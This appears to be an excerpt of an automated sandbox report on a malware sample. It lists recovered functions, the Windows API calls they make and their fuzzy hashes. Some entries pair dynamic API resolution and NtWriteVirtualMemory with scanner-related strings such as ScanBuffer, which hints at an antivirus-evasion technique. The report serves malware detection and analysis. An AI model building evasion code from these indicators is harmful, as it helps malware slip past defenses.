                                                                                                                                              • Opcode Fuzzy Hash: ad8039016cd13b4b156dad24199bb5b2b5e3d3ece3e6b2ffcc57ada4babc4dbf
                                                                                                                                              • Instruction Fuzzy Hash: 1E51BF7D6012408FEB16DF6CC988796BBD0AB45B18F1885AEE54DCB2C2E770D445CBE1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c25f5b18724396ae8efd6d290cdbd74eb11f2b7c5b13750c91d27c5f5f66f145
                                                                                                                                              • Instruction ID: e374531805d0e130a0a5b56a8458f3498ea5409b04a2c1de0e3d89f90c30659d
                                                                                                                                              • Opcode Fuzzy Hash: c25f5b18724396ae8efd6d290cdbd74eb11f2b7c5b13750c91d27c5f5f66f145
                                                                                                                                              • Instruction Fuzzy Hash: 6041AF7DD01214DFDB66DF28E48879A3BE1FB05324F588869E908DB280C7769895CFD2
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 02848020: GetModuleHandleA.KERNELBASE(?), ref: 02848072
                                                                                                                                                • Part of subcall function 028480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0284811B
                                                                                                                                                • Part of subcall function 028480C8: GetProcAddress.KERNEL32(?,?), ref: 0284812D
                                                                                                                                                • Part of subcall function 02847D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D74
                                                                                                                                              • FreeLibrary.KERNEL32(02891384,00000000,02891388,Function_000055D8,00000004,02891398,02891388,05F5E0FF,00000040,0289139C,02891384,00000000,00000000,00000000,00000000,0284890B), ref: 028488EB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$FreeHandleLibraryMemoryModuleVirtualWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3430646871-0
                                                                                                                                              • Opcode ID: cd174ff84cb0c9015b5e4f7d4ceaca9d7aec5c85f4d7fbafd01fc8f7a4bcf37b
                                                                                                                                              • Instruction ID: 0de14735a23cfcc9c0e23d40dc5ea62c11ead13dd9d518b4bbb52eeea46c9dcf
                                                                                                                                              • Opcode Fuzzy Hash: cd174ff84cb0c9015b5e4f7d4ceaca9d7aec5c85f4d7fbafd01fc8f7a4bcf37b
                                                                                                                                              • Instruction Fuzzy Hash: 5C11847CA44308ABEF02FBBCDC05A5E77B9DB45700F4405A4B608E3B90DE789D006B96
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(207A1B20,?,00000105), ref: 02835832
                                                                                                                                                • Part of subcall function 02835A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02835A94
                                                                                                                                                • Part of subcall function 02835A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835AB2
                                                                                                                                                • Part of subcall function 02835A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835AD0
                                                                                                                                                • Part of subcall function 02835A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02835AEE
                                                                                                                                                • Part of subcall function 02835A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02835B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02835B37
                                                                                                                                                • Part of subcall function 02835A78: RegQueryValueExA.ADVAPI32(?,02835CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02835B7D,?,80000001), ref: 02835B55
                                                                                                                                                • Part of subcall function 02835A78: RegCloseKey.ADVAPI32(?,02835B84,00000000,00000000,00000005,00000000,02835B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835B77
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2796650324-0
                                                                                                                                              • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                              • Instruction ID: 1e80a3bbc37518111bc2fc1a877ffae3138f4f0fc0566828a07790ec136ca274
                                                                                                                                              • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                              • Instruction Fuzzy Hash: BFE06DB9A002148BCB11DE5CC8C0A9737D8AB08B50F400565EC58DF34AD3B4D9208BD1
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,02852A49,ScanString,0288CE80,0285AFD8,OpenSession,0288CE80,0285AFD8,ScanBuffer,0288CE80,0285AFD8,OpenSession,0288CE80,0285AFD8,Initialize), ref: 02837E47
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                                                                                              • Instruction ID: 459960a2bfd961c03da75d6f4b79e0c191dbe105e54533840f3f6f402b969908
                                                                                                                                              • Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                                                                                              • Instruction Fuzzy Hash: 3AC08CED2122040E5E52A2FC1CC029A42CA0904A353A01B31E43CDA2D2E311D8222491
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Eventtime
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2982266575-0
                                                                                                                                              • Opcode ID: d0786b8aa167220f8148ae0891bd2fa4cae93bf8a9ef91ff338820754565d543
                                                                                                                                              • Instruction ID: 4920326fd9e4a406738685cab30795b5aae8827dee937b100c042cef04aa5f9a
                                                                                                                                              • Opcode Fuzzy Hash: d0786b8aa167220f8148ae0891bd2fa4cae93bf8a9ef91ff338820754565d543
                                                                                                                                              • Instruction Fuzzy Hash: CDC092FC7843003EF62166AC2CC2F33718EE304B14F610412BB00FE2D5E5E24C640A66
                                                                                                                                              APIs
                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02834BEB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocString
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2525500382-0
                                                                                                                                              • Opcode ID: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                                                                                                                              • Instruction ID: 6509dee010251f01cfc184e5feb2af88e33aaa63dd58c7db93f591a5f53f2779
                                                                                                                                              • Opcode Fuzzy Hash: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                                                                                                                              • Instruction Fuzzy Hash: 93B0123C24820618FA5355E10D00BB2008C5B5168BF8400919E2CC80C0FF41C41088F3
                                                                                                                                              APIs
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02834C03
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3341692771-0
                                                                                                                                              • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                              • Instruction ID: b03e69c5882025466abdee8b3d23e60f75a20912e9bd04f326fd0dcdb862c15a
                                                                                                                                              • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                              • Instruction Fuzzy Hash: ABA022AC0003030AAF0B232C000002A20333FE0B023CAC0E88008CA0008F3EC000ACF0
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 028316A4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              • Opcode ID: 2a669a7bab91db20cb42b3a2af6935233a7b8fda59e4b257e86bb6dad1c1a824
                                                                                                                                              • Instruction ID: 2683693517bd6c29818727cd30ad420e8f9fd2257c7fa33b699c0402b5ee3d17
                                                                                                                                              • Opcode Fuzzy Hash: 2a669a7bab91db20cb42b3a2af6935233a7b8fda59e4b257e86bb6dad1c1a824
                                                                                                                                              • Instruction Fuzzy Hash: 71F0FABAB047947BD7118E8A9C80B82BB94FB40720F080139EA4CDB380D7B2A8108BD4
                                                                                                                                              APIs
                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02831704
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                              • Opcode ID: 86c574c5c11301c485f4279c349625d5dfc57258dd40763e2b5c5227eb9289bd
                                                                                                                                              • Instruction ID: 485af8e8de8a41dafa4e32522b73fd3f5490ac33a013dfa625bfb92ba7cd91e7
                                                                                                                                              • Opcode Fuzzy Hash: 86c574c5c11301c485f4279c349625d5dfc57258dd40763e2b5c5227eb9289bd
                                                                                                                                              • Instruction Fuzzy Hash: 29E0867D3003016FE7215A7D4D88712BBD9EB45B74F284975F559DB2D1D7A0D8008BA4